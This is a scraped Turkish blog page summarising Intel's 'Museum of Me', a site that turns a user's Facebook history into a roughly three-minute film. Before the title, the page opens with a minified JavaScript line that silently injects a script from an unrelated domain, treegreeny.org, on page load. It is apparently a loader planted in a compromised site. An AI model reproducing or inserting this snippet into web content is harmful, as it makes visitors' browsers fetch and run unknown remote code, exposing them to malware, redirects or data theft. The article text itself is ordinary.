;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Facebook Müzesi! - elmasuyu.net
Kategoriler
Genel

Facebook Müzesi!

Sosyal ağlardaki bilgilerinizi infografik haline getiren siteler artık geride kaldı. İntel’in son çalışması ile Facebook geçmişiniz film haline getirilebiliyor.

“Benim Müzem” (The Museum of Me) adlı siteye girip “Facebook’la bağlan” butonuna bastığınızda Facebook’taki bilgileriniz toplanıyor ve kategorilerine göre ayrılıyor. Bu uygulama ile arkadaşlıklarınız, beğendikleriniz ve fotoğraflarınız yani tüm Facebook geçmişiniz bir müzede gezer gibi…

size gösterilmek için hazırlanıyor ve film olarak izleyebiliyorsunuz. Bilgileri aktarma ve düzenleme işi yoğunluğa göre biraz zaman alabiliyor ve bu arada beklemek istemiyorsanız İntel’in tanıtım için hazırladığı aşağıdaki videoyu izleyebilirsiniz:

 

facebook müzesi

 

Ve müzeniz hazır!

Tamamen size ait olan ve Facebook geçmişinizin sergilendiği bu müze, arkadaşlarınız, beğendiğiniz bağlantılar, paylaştığınız durum güncellemeleri, gezdiğiniz yerler olarak farklı bölümlere ayrılmış ve her bölümde Facebook geçmişinizin kısa bir özetini bulabilirsiniz. Yaklaşık 3 dakika süren videonun tek eksiği ise kaydetme ve bilgisayarınıza indirme şansınızın şimdilik olmaması.

Kaynak: DYG

 

 

Yazar Eren Şahin

zenaat yönetmeni